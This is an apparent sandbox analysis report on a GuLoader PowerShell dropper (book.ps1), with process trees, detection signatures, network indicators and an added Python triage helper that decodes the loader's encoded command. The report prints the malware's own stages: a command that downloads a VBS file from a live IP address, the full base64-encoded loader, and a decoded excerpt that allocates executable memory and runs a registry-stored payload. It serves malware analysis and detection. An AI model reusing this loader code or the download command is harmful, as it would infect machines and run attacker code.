Windows Analysis Report
book.ps1

Overview

General Information

Sample Name: book.ps1
Analysis ID: 623683
MD5: 10c1a6b6135d5f641ed56cfde0da1967
SHA1: dbf7d6327c2bf13f3ae772f6eaaa1c0a5fc5473e
SHA256: 75de1e1b097579bf1a18c494042b16192a969dfb0fb9cdb3759d362b7b4b6a5f
Tags: Guloader, ps1

Detection

GuLoader
Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Yara detected GuLoader
Wscript starts Powershell (via cmd or directly)
Encrypted powershell cmdline option found
Very long command line found
Potential dropper URLs found in powershell memory
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Drops PE files
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Found dropped PE file which has not been started or loaded
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • powershell.exe (PID: 3144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\book.ps1" MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 1716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 6344 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Invoke-WebRequest -uri http://46.4.198.55/10P/Sursdepa.vbs -o Sursdepa.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
    • wscript.exe (PID: 6948 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Sursdepa.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
      • powershell.exe (PID: 6276 cmdline: C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzADUANQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ADYAKQA7AA0ACgB9AA0ACgAiAEAADQAKACMAR
ABFAEgAQQBDAEgARQAgAFQAbwBzAHMAZQAzACAAVABlAGEAdABlAHIANgAgAGQAaQBhAGwAZQBjAHQAaQBjACAARQBOAEwASQBTAFQARQBEAFIAIABGAGQAcwBlADcAIABBAHMAdAByAG8AIABTAHcAZQByAHYAZQByADkAIABkAG8AdwBuAGUAeQAgAHIAaQBiAGgAdQBzAHQAIABUAGEAZwByACAAUwBwAHIAZwBlAHMAIABWAGkAbABsAGEANQAgAEgAZQB0AGUAcgBvAGQAeQBuADEAIABFAFUAUABMAE8ASQAgAEIAeQB0AHQAZQAzACAAcwBuAGsAZQByAGYAcgAgAEIAdQBuAGQAZwBhAHIAbgAgAHMAdAByAG0AawByAGUAZABzACAATAB0AG4AaQBuAGcAYgBpADUAIABpAG4AZABzACAAQQBpAHIAbABpAGYAdAA1ACAATwBDAFQAQQBWAEkATgBBAFYASQAgAFMAawBvAGsAbwBtAGkAcwBoAGIAIABVAGQAcgBlAG4AcwBuAGkAbgBnADUAIABUAGgAcgBhAHcAYwB5ACAATQBvAG4AbwBzAG8AZABpADUAIABpAG0AcABhAGwAZQBtAGUAIABJAG4AZABzAGEAdABzAGUAbgB0ADcAIABvAHIAZABlAG4AcwBtACAAIAANAAoAJABIAGUAeABhAHMAdABpAGMAaAAzAD0AMAA7AA0ACgAkAEgAZQB4AGEAcwB0AGkAYwBoADkAPQAxADAANAA4ADUANwA2ADsADQAKACQASABlAHgAYQBzAHQAaQBjAGgAOAA9AFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBWAEEAKAAtADEALABbAHIAZQBmAF0AJABIAGUAeABhAHMAdABpAGMAaAAzACwAMAAsAFsAcgBlAGYAXQAkAEgAZQB4AGEAcwB0AGkAYwBoADkALAAxADIAMgA4ADgALAA2ADQAKQANAAoAJABTAGUAbgBhAHQAZQByAGYAbwA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAVABJAE8ATABPAEcAIgApAC4AQQBjAGUAdABhAG0AaQBkAHAAaAAyAA0ACgANAAoAJABVAHQAaQBsACAAPQAgAFsAUwB5AHMAdABlAG0ALgBCAHkAdABlAFsAXQBdADoAOgBDAHIAZQBhAHQAZQBJAG4AcwB0AGEAbgBjAGUAKABbAFMAeQBzAHQAZQBtAC4AQgB5AHQAZQBdACwAJABTAGUAbgBhAHQAZQByAGYAbwAuAEwAZQBuAGcAdABoACAALwAgADIAKQANAAoADQAKAA0ACgANAAoARgBvAHIAKAAkAGkAPQAwADsAIAAkAGkAIAAtAGwAdAAgACQAUwBlAG4AYQB0AGUAcgBmAG8ALgBMAGUAbgBnAHQAaAA7ACAAJABpACsAPQAyACkADQAKAAkAewANAAoAIAAgACAAIAAgACAAIAAgACQAVQB0AGkAbABbACQAaQAvADIAXQAgAD0AIABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAeQB0AGUAKAAkAFMAZQBuAGEAdABlAHIAZgBvAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAgADIAKQAsACAAMQA2ACkADQAKACAAIAAgACAAfQANAAoADQAKAA0ACgBmAG8AcgAoACQAYwBvAG4AYwBvAG0AaQB0AGEAPQAwADsAIAAkAGMAbwBuAGMAbwBtAGkAdABhACAALQBsAHQAIAAkAFUAdABpAGwALgBjAG8AdQBuAHQAIAA7ACAAJABjAG8AbgBjAG8AbQBpAHQAYQArACsAKQANAAoAewANAAoACQANAAoAWwBIAGUAeABhAHMAdABpAGMAaAAxAF0AOgA6AFIAd
ABsAE0AbwB2AGUATQBlAG0AbwByAHkAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMAKwAkAGMAbwBuAGMAbwBtAGkAdABhACwAWwByAGUAZgBdACQAVQB0AGkAbABbACQAYwBvAG4AYwBvAG0AaQB0AGEAXQAsADEAKQANAAoADQAKAH0ADQAKAFsASABlAHgAYQBzAHQAaQBjAGgAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAEgAZQB4AGEAcwB0AGkAYwBoADMALAAgADAAKQANAAoADQAKAA0ACgA= MD5: DBA3E6449E97D4E3DF64527EF7012A10)
        • conhost.exe (PID: 4084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • csc.exe (PID: 5752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xtg032l3\xtg032l3.cmdline" MD5: 350C52F71BDED7B99668585C15D70EEA)
          • cvtres.exe (PID: 1280 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5295.tmp" "c:\Users\user\AppData\Local\Temp\xtg032l3\CSC5582155B3987404B8B25346C869765C.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
No configs have been found

Yara match:
    Source: 0000000E.00000002.544284081.0000000009290000.00000040.00000800.00020000.00000000.sdmp
    Rule: JoeSecurity_GuLoader_2
    Description: Yara detected GuLoader
    Author: Joe Security
    No Sigma rule has matched
    No Snort rule has matched
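The -EncodedCommand argument that wscript.exe hands to the 32-bit PowerShell (PID 6276 in the tree above) is base64 over the UTF-16LE script text, which is why it is 4264 bytes long and why the sandbox reports it as encrypted. Decoding it shows an Add-Type P/Invoke stub that imports RtlMoveMemory, NtAllocateVirtualMemory (aliased VA) and EnumWindows, a 1 MiB allocation with MEM_COMMIT|MEM_RESERVE (12288) and PAGE_EXECUTE_READWRITE (64), a hex-encoded payload read from the registry value HKCU:\Software\TIOLOG\Acetamidph2, a byte-by-byte copy into that buffer, and a jump into it through the EnumWindows callback. The Python below is an added triage helper, not part of the report or of Joe Sandbox; it re-encodes an excerpt of that decoded script as a constructed sample (the original's junk comment lines are left out), decodes it the way powershell.exe would, and extracts the indicators. The API sets, regexes and indicator names are the author's own choices.

```python
import base64
import re

# Constructed sample: an excerpt of the second-stage script recovered by decoding
# the -EncodedCommand argument in the process tree above (PID 6276). The original's
# junk comment lines are omitted; identifiers are as decoded.
DECODED_EXCERPT = r'''Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
public static class Hexastich1
{
[DllImport("KERNEL32")]public static extern void RtlMoveMemory(IntPtr Bagfuls51,ref Int32 Bagfuls52,int Bagfuls53);
[DllImport("ntdll.dll", EntryPoint="NtAllocateVirtualMemory")]public static extern int VA(int Hexastich6,ref Int32 Semire,int Bagfuls5,ref Int32 Hexastich,int Print8,int Hexastich7);
[DllImport("USER32")]public static extern IntPtr EnumWindows(uint Bagfuls55,int Bagfuls56);
}
"@
$Hexastich3=0;
$Hexastich9=1048576;
$Hexastich8=[Hexastich1]::VA(-1,[ref]$Hexastich3,0,[ref]$Hexastich9,12288,64)
$Senaterfo=(Get-ItemProperty -Path "HKCU:\Software\TIOLOG").Acetamidph2
$Util = [System.Byte[]]::CreateInstance([System.Byte],$Senaterfo.Length / 2)
For($i=0; $i -lt $Senaterfo.Length; $i+=2)
    {
        $Util[$i/2] = [convert]::ToByte($Senaterfo.Substring($i, 2), 16)
    }
for($concomita=0; $concomita -lt $Util.count ; $concomita++)
{
[Hexastich1]::RtlMoveMemory($Hexastich3+$concomita,[ref]$Util[$concomita],1)
}
[Hexastich1]::EnumWindows($Hexastich3, 0)
'''

# What powershell.exe -EncodedCommand actually carries: base64 of the UTF-16LE text.
SAMPLE_ENCODED = base64.b64encode(DECODED_EXCERPT.encode("utf-16-le")).decode("ascii")

# Author's lists of APIs that together make up a "P/Invoke shellcode loader".
ALLOC_APIS = {"NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx"}
COPY_APIS = {"RtlMoveMemory", "WriteProcessMemory", "memcpy"}
CALLBACK_APIS = {"EnumWindows", "EnumChildWindows", "CallWindowProcA", "CallWindowProcW"}

# [DllImport("dll", EntryPoint="Real")]public static extern <ret> Alias(
DLLIMPORT_RE = re.compile(
    r'\[DllImport\("(?P<dll>[^"]+)"(?:,\s*EntryPoint\s*=\s*"(?P<entry>[^"]+)")?\)\]'
    r'\s*public\s+static\s+extern\s+\S+\s+(?P<alias>\w+)\s*\(', re.I)
REGISTRY_READ_RE = re.compile(r'Get-ItemProperty\s+-Path\s+"([^"]+)"\)\.(\w+)')


def decode_encoded_command(b64: str) -> str:
    """Decode a -EncodedCommand value; tolerates stripped padding and a BOM."""
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le").lstrip("\ufeff")


def _call_args(script: str, alias: str):
    """Return the argument list of the first [Type]::alias(...) call, or None."""
    m = re.search(r"::" + re.escape(alias) + r"\(([^)]*)\)", script)
    return [a.strip() for a in m.group(1).split(",")] if m else None


def _ints(args) -> set:
    """Numeric literals among the arguments (decimal or 0x-hex); names are skipped."""
    out = set()
    for a in args:
        try:
            out.add(int(a, 0))
        except ValueError:
            pass
    return out


def triage(script: str) -> dict:
    """Pull the indicators an analyst wants from a decoded loader script."""
    # alias -> real export name (EntryPoint= lets the script hide the real name)
    imports = {m.group("alias"): (m.group("entry") or m.group("alias"))
               for m in DLLIMPORT_RE.finditer(script)}
    rwx = False
    for alias, real in imports.items():
        args = _call_args(script, alias)
        if real in ALLOC_APIS and args:
            nums = _ints(args)
            rwx = 0x3000 in nums and 0x40 in nums  # MEM_COMMIT|MEM_RESERVE + PAGE_EXECUTE_READWRITE
    reg = REGISTRY_READ_RE.search(script)
    return {
        "resolved_apis": sorted(set(imports.values())),
        "rwx_allocation": rwx,
        "payload_registry_value": reg.group(1) + "\\" + reg.group(2) if reg else None,
        "callback_trigger": any(real in CALLBACK_APIS and _call_args(script, a) is not None
                                for a, real in imports.items()),
        "add_type_compile": "Add-Type" in script,
    }


def verdict(ind: dict) -> str:
    apis = set(ind["resolved_apis"])
    if apis & ALLOC_APIS and apis & COPY_APIS and ind["callback_trigger"] and ind["rwx_allocation"]:
        return "shellcode loader: RWX allocation + memory copy + callback execution"
    return "no loader pattern matched"
```

Run `triage(decode_encoded_command(value))` on the real argument copied out of the process tree; the registry value it reports is where the VBS stage stored the hex-encoded shellcode, so that key is the next thing to export from the infected host (the sandbox's own memory dump of PID 6276 at 0x09290000 is what the GuLoader Yara rule matched).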

    AV Detection

    Source: http://46.4.198.55 | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbsh | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~ | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$ | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.vbs0yj | Avira URL Cloud: Label: malware
    Source: http://46.4.198.55/10P/Sursdepa.v | Avira URL Cloud: Label: malware
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

    Networking

    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Version, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:DefaultNoun, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:InstanceCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:StaticCmdlets, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:CmdletAdapterPrivateData
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQuery8Q1
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyCollection, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowEmptyString, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:AllowNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNull, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateNotNullOrEmpty, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateCount, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateLength, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateRange, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ValidateSet, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Obsolete
    Source: powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp | String found in memory: http://schemas.microsoft.com/cmdlets-over-objects/2009/11:Type, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MaxValueQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:RegularQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:ExcludeQuery, http://schemas.microsoft.com/cmdlets-over-objects/2009/11:MinValueQueryX
    Source: global traffic | HTTP traffic detected:
        GET /10P/Sursdepa.vbs HTTP/1.1
        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1
        Host: 46.4.198.55
        Connection: Keep-Alive
    Source: unknown | TCP traffic detected without corresponding DNS query: 46.4.198.55 (50 occurrences)
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55
    Source: powershell.exe, 00000003.00000002.292149897.00000167E848D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.v
    Source: powershell.exe, 00000003.00000002.295924482.00000167E855C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282654233.00000167E5B98000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs
    Source: powershell.exe, 00000003.00000002.282555129.00000167E5B10000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282734936.00000167E5D20000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs
    Source: powershell.exe, 00000003.00000002.301030775.00000167FFDE7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281332697.00000167FFDE2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbs$
    Source: powershell.exe, 00000003.00000002.282784282.00000167E5E50000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs-oSursdepa.vbsPROCE~
    Source: powershell.exe, 00000003.00000002.283365528.00000167E7941000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbs0yj
    Source: powershell.exe, 00000003.00000002.282562516.00000167E5B18000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55/10P/Sursdepa.vbsh
    Source: powershell.exe, 00000003.00000002.291993944.00000167E846B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://46.4.198.55x
    Source: powershell.exe, 00000001.00000002.335374156.00000211CEF07000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.300317707.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281232280.00000167FFBBB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.528421591.0000000002D8B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: powershell.exe, 00000001.00000002.323271463.00000211B7732000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://go.micros
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: powershell.exe, 00000001.00000002.318892077.00000211B6EF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.282944131.00000167E7731000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000001.00000002.326189443.00000211B7C6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.319640353.00000211B710D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 0000000E.00000002.529576205.0000000004C24000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000003.00000002.298249127.00000167E8C5F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
    Source: powershell.exe, 00000003.00000002.300436047.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.281286699.00000167FFC19000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://go.microsoft.co
    Source: powershell.exe, 00000001.00000002.334605555.00000211C6F52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.299389290.00000167F779E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe

    System Summary

    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowspowerShell\v1.0\powershell.exe" -EncodedCommand "IwBiAHIAZABmAGQAdAB0AG8AbgAgAFMAdAB2AG4AZQAgAFoAaQBuAGMAZQBkACAASQBOAEQAUwBUAFQAIABNAGUAdAB0AGEAcgB0AGEAbQBnADcAIABTAGEAbABhACAAYwBlAGIAYQBsACAARgBPAFIAUwBUACAATwBzAHQAZQBvAGwAaQB0ADEAIABVAG4AZABpAHMAYwBvAHUANgAgAEEAZAByAGUAcwBzAGEAIABDAGEAbgBhAGQAaQA5ACAATwBWAEUAUgBUAEEATABFACAAQgBlAG0AZQAgAGQAZQBzAHQAcgB1AGsAdABpACAATwBTAFQARQBBAE4AUgBFAFQATgAgAEQAcgBpAGYAdABzAHMAdAB5AHIAMQAgAEkATgBEAEwARQBEAEUATgBEAEUAIABCAGEAZwB0ADcAIABCAEEAUgBTAEwARQBEAEUAUwAgAE8ATwBQAEgATwAgAEwAYQBjAGUAZAA5ACAADQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAASABlAHgAYQBzAHQAaQBjAGgAMQANAAoAewANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAHYAbwBpAGQAIABSAHQAbABNAG8AdgBlAE0AZQBtAG8AcgB5ACgASQBuAHQAUAB0AHIAIABCAGEAZwBmAHUAbABzADUAMQAsAHIAZQBmACAASQBuAHQAMwAyACAAQgBhAGcAZgB1AGwAcwA1ADIALABpAG4AdAAgAEIAYQBnAGYAdQBsAHMANQAzACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbgB0AGQAbABsAC4AZABsAGwAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIATgB0AEEAbABsAG8AYwBhAHQAZQBWAGkAcgB0AHUAYQBsAE0AZQBtAG8AcgB5ACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAVgBBACgAaQBuAHQAIABIAGUAeABhAHMAdABpAGMAaAA2ACwAcgBlAGYAIABJAG4AdAAzADIAIABTAGUAbQBpAHIAZQAsAGkAbgB0ACAAQgBhAGcAZgB1AGwAcwA1ACwAcgBlAGYAIABJAG4AdAAzADIAIABIAGUAeABhAHMAdABpAGMAaAAsAGkAbgB0ACAAUAByAGkAbgB0ADgALABpAG4AdAAgAEgAZQB4AGEAcwB0AGkAYwBoADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBVAFMARQBSADMAMgAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEUAbgB1AG0AVwBpAG4AZABvAHcAcwAoAHUAaQBuAHQAIABCAGEAZwBmAHUAbABzAD
